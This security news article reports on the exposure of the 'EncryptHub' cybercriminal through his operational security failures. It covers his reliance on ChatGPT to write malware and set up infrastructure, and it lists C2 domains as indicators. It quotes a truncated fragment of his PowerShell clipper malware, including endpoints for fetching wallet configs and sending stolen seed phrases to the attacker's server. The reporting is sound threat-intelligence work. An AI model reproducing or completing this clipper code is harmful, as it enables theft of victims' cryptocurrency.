A notorious threat actor operating under the alias “EncryptHub” has been exposed due to a series of operational security failures and unconventional use of AI tools.
This Ukrainian cybercriminal, who fled his hometown approximately a decade ago, has been orchestrating increasingly sophisticated ransomware campaigns since early 2024, targeting organizations worldwide with custom-built malware designed to steal cryptocurrency and sensitive information.
.webp)
The threat actor’s journey into cybercrime appears to have begun after unsuccessful attempts at legitimate employment and brief involvement with bug bounty programs.
What distinguishes EncryptHub from typical cybercriminals is the dichotomy of his activities – while conducting malicious campaigns, he simultaneously contributed to legitimate security research, even receiving acknowledgment from Microsoft Security Response Center for discovering CVE-2025-24071 and CVE-2025-24061.
What ultimately led to EncryptHub’s unmasking was a catastrophic series of operational security failures, including password reuse across criminal infrastructure, failure to enable two-factor authentication, and inadequate server hardening that left directory listings publicly accessible.
Perhaps most critically, the threat actor tested his own malware on development systems, inadvertently exfiltrating his personal information and access credentials.
Outpost24’s KrakenLabs researchers identified the malware after discovering an exposed JSON configuration file on EncryptHub’s command and control server.
This file contained Telegram bot information that provided investigators with a digital trail leading directly to the threat actor’s activities.
Initial discovery and analysis
According to the KrakenLabs team, this initial discovery “was actually what triggered the entire investigation”.
The most fascinating aspect of this case is EncryptHub’s extensive reliance on ChatGPT as a “partner in crime.”
The AI assistant was leveraged to create nearly every component of his malicious infrastructure, from writing malware code to configuring Telegram bots, command and control servers, phishing sites, and onion services.
In one particularly revealing conversation, EncryptHub asked the AI to evaluate whether he was better suited to be a “black hat or white hat” hacker, even confessing to criminal activities and exploits he had developed.
The clipper malware developed with ChatGPT’s assistance represents one of EncryptHub’s primary attack vectors.
This PowerShell-based malware was designed to monitor clipboards for cryptocurrency wallet addresses and replace them with attacker-controlled alternatives.
The code demonstrates how the malware loads wallet configurations from a remote server and operates continuously to intercept transactions:-
# URL API для получения конфига и отправки сид-фраз
$serverConfigUrl = "https:// dmin/clipper/config"
$serverSendSeedUrl = "https: /admin/clipper/send_seed"
# Функция получения публичного IP
function Get-PublicIP {
try {
$response = Invoke-RestMethod -Uri "https://api64.ipify.org?format=json" -Errc
return $response.ipThis case highlights the emerging trend of threat actors leveraging artificial intelligence for malware development while still falling victim to basic security mistakes.
EncryptHub’s exposed infrastructure revealed numerous IOCs, including multiple PowerShell scripts, executable files, and command and control domains like vexio[.]io and echonex[.]ai that organizations should monitor for in their environments.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
